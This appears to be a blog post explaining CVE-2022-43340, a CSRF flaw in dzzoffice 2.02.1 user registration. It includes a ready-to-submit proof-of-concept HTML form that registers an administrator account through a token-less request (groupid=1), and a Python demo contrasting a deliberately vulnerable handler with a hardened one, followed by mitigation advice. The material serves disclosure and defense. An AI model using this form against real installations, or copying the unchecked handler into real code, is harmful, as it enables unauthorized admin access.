In this post, we'll discuss a recently disclosed security vulnerability, CVE-2022-43340, a Cross-Site Request Forgery (CSRF) in the popular web-based collaboration tool dzzoffice 2.02.1_SC_UTF8. The vulnerability allows an attacker to abuse the user registration process and obtain administrator rights for an ordinary user account. We'll go through the exploit in depth, provide the relevant code, link to the original references, and cover the important details surrounding the issue.

Issue

dzzoffice is a powerful open-source office collaboration software that enables users to create, edit, and share different types of documents. The vulnerability in question is a Cross-Site Request Forgery (CSRF) that exists within the user registration module of dzzoffice, which allows an attacker to send a forged HTTP request on behalf of an unsuspecting victim. This can result in the creation of unauthorized user accounts and potentially grant administrator rights to regular users.

Exploit Details

To exploit this vulnerability, an attacker can use a crafted HTTP request via either a GET or POST request. This request will include the necessary parameters to create a user account with administrator privileges.

A sample HTML form that demonstrates this exploit is shown below:

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2022-43340 - CSRF Exploit</title>
</head>
<body>
  <h1>CVE-2022-43340 - CSRF Exploit</h1>
  <form action="http://<target>/dzzoffice/index.php?mod=user&op=register" method="POST" enctype="multipart/form-data">
    <!-- formhash left empty: the vulnerable version accepts the registration without a valid anti-CSRF token -->
    <input type="hidden" name="formhash" value="" />
    <input type="hidden" name="username" value="attacker" />
    <input type="hidden" name="password" value="p@sswrd" />
    <input type="hidden" name="password2" value="p@sswrd" />
    <input type="hidden" name="email" value="attacker@example.com" />
    <input type="hidden" name="groupid" value="1" />
    <input type="submit" value="Submit" />
  </form>
</body>
</html>

When the victim clicks the "Submit" button on the above HTML form, a new user account will be created for the attacker, and the attacker will be granted administrative rights.
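To make the defect concrete, here is an added example (written for this post, not dzzoffice's own code) of a minimal registration handler in Python: a vulnerable version that mirrors the behaviour the form above relies on (the formhash token is read but never checked, and the client-chosen groupid is honoured), beside a hardened version that requires POST, checks the Origin/Referer header against the site's origin, binds the formhash token to the session and compares it in constant time, and ignores any client-supplied group. The Request model, the SITE_ORIGIN value and DEFAULT_GROUPID are constructed placeholders for the example; the endpoint path and form fields are taken from the form on this page.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Endpoint from the page's form; site origin and default group are placeholders for this example.
REGISTER_PATH = "/dzzoffice/index.php?mod=user&op=register"
SITE_ORIGIN = "http://target.example"   # assumed origin of the dzzoffice install
DEFAULT_GROUPID = 10                    # assumed "ordinary member" group; 1 is the admin group per the exploit


@dataclass
class Request:
    """Minimal model of the HTTP request the handler sees (constructed for this example)."""
    method: str
    path: str
    headers: dict
    form: dict
    session: dict = field(default_factory=dict)


def issue_formhash(session: dict) -> str:
    """Mint a per-session anti-CSRF token and store it server-side."""
    token = secrets.token_hex(16)
    session["formhash"] = token
    return token


def register_vulnerable(req: Request, users: dict) -> tuple[int, str]:
    """Handler as the page describes: formhash is never validated, so a forged
    cross-site request with an empty token creates the account, and groupid
    comes straight from the attacker-controlled form."""
    if req.method not in ("GET", "POST"):
        return 405, "method not allowed"
    if req.form.get("password") != req.form.get("password2"):
        return 400, "passwords do not match"
    users[req.form["username"]] = {"groupid": int(req.form.get("groupid", DEFAULT_GROUPID))}
    return 200, "registered"


def register_hardened(req: Request, users: dict) -> tuple[int, str]:
    """Same handler with the CSRF defences that close this class of bug."""
    # 1. A state-changing action is accepted over POST only (an <img src=...> GET must not register anyone).
    if req.method != "POST":
        return 405, "method not allowed"
    # 2. Origin (or Referer) must belong to this site; a form hosted elsewhere fails here.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith(SITE_ORIGIN):
        return 403, "cross-origin request rejected"
    # 3. The token must exist in this session and match in constant time.
    expected = req.session.get("formhash")
    supplied = req.form.get("formhash", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "invalid formhash"
    if req.form.get("password") != req.form.get("password2"):
        return 400, "passwords do not match"
    # 4. Privilege is never taken from the request: self-registered users land in the default group.
    users[req.form["username"]] = {"groupid": DEFAULT_GROUPID}
    return 200, "registered"


def forged_request() -> Request:
    """The POST the page's HTML form produces when submitted from an attacker-hosted page."""
    return Request(
        method="POST", path=REGISTER_PATH,
        headers={"Origin": "http://evil.example"},   # constructed: the page hosting the form
        form={"formhash": "", "username": "attacker", "password": "p@sswrd",
              "password2": "p@sswrd", "email": "attacker@example.com", "groupid": "1"},
        session={"formhash": "token-of-the-victims-session"},  # the victim is logged in
    )


def legitimate_request() -> Request:
    """A genuine same-origin registration carrying the token the server issued to this session."""
    session: dict = {}
    token = issue_formhash(session)
    return Request(
        method="POST", path=REGISTER_PATH,
        headers={"Origin": SITE_ORIGIN},
        form={"formhash": token, "username": "alice", "password": "pw1", "password2": "pw1",
              "email": "alice@example.com", "groupid": "1"},   # groupid=1 is still ignored
        session=session,
    )


if __name__ == "__main__":
    for handler in (register_vulnerable, register_hardened):
        users: dict = {}
        print(handler.__name__, "forged ->", handler(forged_request(), users), users)
        users = {}
        print(handler.__name__, "legit  ->", handler(legitimate_request(), users), users)
```

Running the block shows the vulnerable handler creating `attacker` in group 1 from the forged request, while the hardened handler rejects it at the origin check (and would reject it at the token check even if the origin were spoofed) and registers the legitimate user in the default group regardless of the groupid field.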

Mitigation

As a temporary workaround, disable user registration in the application settings until a patched version is available. The root cause is that the registration request is accepted without a valid anti-CSRF token (the form above succeeds with an empty formhash), so the fix on the developers' side is to validate that token server-side for the registration action and reject any request that does not carry one bound to the current session.

References

- MITRE CVE page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43340
- NIST National Vulnerability Database (NVD) page: https://nvd.nist.gov/vuln/detail/CVE-2022-43340

Conclusion

In conclusion, CVE-2022-43340 is a critical security vulnerability affecting dzzoffice 2.02.1_SC_UTF8 that can lead to unauthorized access, data breaches, and potential downtime for the application. Administrators should take appropriate security measures and ensure their systems are protected against such attacks. Keep an eye out for patches and updates from dzzoffice, and make sure your installations always carry the latest security fixes.

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/31/2022 15:57:00 UTC